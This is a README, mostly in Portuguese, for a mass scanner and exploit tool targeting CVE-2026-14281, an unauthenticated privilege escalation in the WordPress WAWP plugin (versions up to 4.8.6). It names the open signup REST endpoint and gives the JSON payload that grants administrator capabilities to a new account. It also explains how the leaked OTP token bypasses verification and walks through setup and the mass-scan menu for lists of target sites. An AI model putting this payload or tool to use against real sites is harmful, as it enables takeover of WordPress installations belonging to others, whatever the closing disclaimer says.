
Scanner em massa e exploit de alvo único para CVE-2026-14281, uma escalada de privilégios não autenticada no plugin WordPress Automation Web Platform via REST signup.
Scanner em massa + Exploit para alvo único para CVE-2026-14281 — uma escalada de privilégios não autenticada no plugin WordPress Automation Web Platform (WAWP)
<= 4.8.6.
Gerenciamento de Privilégios Inadequado (CWE-269) no plugin WordPress Automation Web Platform (por 101gen). As versões <= 4.8.6 são afetadas.
| Campo | Valor |
|---|---|
| CVE | CVE-2026-14281 |
| Tipo | Escalada de Privilégios Não Autenticada |
| CVSS | 9.8 (CRÍTICO) |
| Autenticação | Nenhuma necessária |
| Afetado | Plugin WAWP <= 4.8.6 |
O plugin expõe uma rota REST pública:
POST /wp-json/wawp/v1/signup/<op>
Sem verificação de permissão. O handler copia wawp_custom_fields controlado pelo atacante para update_user_meta() — sem allowlist. O atacante define:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Resultado: a nova conta recebe o papel de administrator.
O token OTP (otp_transient) é retornado em texto simples no corpo da resposta. Uma requisição GET com esse token o marca como verificado — sem necessidade de e-mail/SMS.
/wp-json/wawp/v1/signup/ com wp_capabilities: administrator/wp-login.php com as novas credenciais/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: arquivo de lista de alvos de entrada, arquivo de saída (padrão vuln.txt), número de threads (padrão 20).
Verify Single: digite YA, insira a URL do alvo. A ferramenta cria um admin temporário, verifica e depois limpa.
vuln.txt contém apenas URLs vulneráveis confirmadas, uma por linha:
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Use com sabedoria. O conhecimento serve para proteger, não para destruir.
Link do CVE: https://nvd.nist.gov/vuln/detail/CVE-2026-14281